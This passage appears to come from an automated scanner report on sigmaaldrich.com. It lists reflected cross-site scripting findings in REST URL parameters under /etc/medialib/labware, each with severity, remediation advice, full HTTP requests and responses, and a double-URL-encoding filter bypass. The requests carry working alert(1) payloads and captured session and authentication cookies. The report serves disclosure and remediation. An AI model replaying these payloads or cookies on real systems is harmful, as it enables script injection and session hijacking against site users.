Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcdfc7b";alert(1)//f1d6d11a0ec/medialib/labware/labware-icons/multiwell-plates","E404") ;
   </script>
...[SNIP]...

1.379. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2ebf%2522%253balert%25281%2529%252f%252f38be9881d52 was submitted in the REST URL parameter 2. This input was echoed as a2ebf";alert(1)//38be9881d52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialiba2ebf%2522%253balert%25281%2529%252f%252f38be9881d52/labware/labware-icons/multiwell-plates HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialiba2ebf";alert(1)//38be9881d52/labware/labware-icons/multiwell-plates","E404") ;
   </script>
...[SNIP]...

1.380. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cce6a%2522%253balert%25281%2529%252f%252f8ebe7c80733 was submitted in the REST URL parameter 3. This input was echoed as cce6a";alert(1)//8ebe7c80733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwarecce6a%2522%253balert%25281%2529%252f%252f8ebe7c80733/labware-icons/multiwell-plates HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwarecce6a";alert(1)//8ebe7c80733/labware-icons/multiwell-plates","E404") ;
   </script>
...[SNIP]...

1.381. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7e4b%2522%253balert%25281%2529%252f%252fbf11d69f6c4 was submitted in the REST URL parameter 4. This input was echoed as e7e4b";alert(1)//bf11d69f6c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconse7e4b%2522%253balert%25281%2529%252f%252fbf11d69f6c4/multiwell-plates HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconse7e4b";alert(1)//bf11d69f6c4/multiwell-plates","E404") ;
   </script>
...[SNIP]...

1.382. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e16d0%2522%253balert%25281%2529%252f%252f236deded540 was submitted in the REST URL parameter 5. This input was echoed as e16d0";alert(1)//236deded540 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/multiwell-platese16d0%2522%253balert%25281%2529%252f%252f236deded540 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/multiwell-platese16d0";alert(1)//236deded540","E404") ;
   </script>
...[SNIP]...

1.383. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/ph-supplies [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/ph-supplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df8a%2522%253balert%25281%2529%252f%252f53c8f92fc22 was submitted in the REST URL parameter 1. This input was echoed as 8df8a";alert(1)//53c8f92fc22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8df8a%2522%253balert%25281%2529%252f%252f53c8f92fc22/medialib/labware/labware-icons/ph-supplies HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
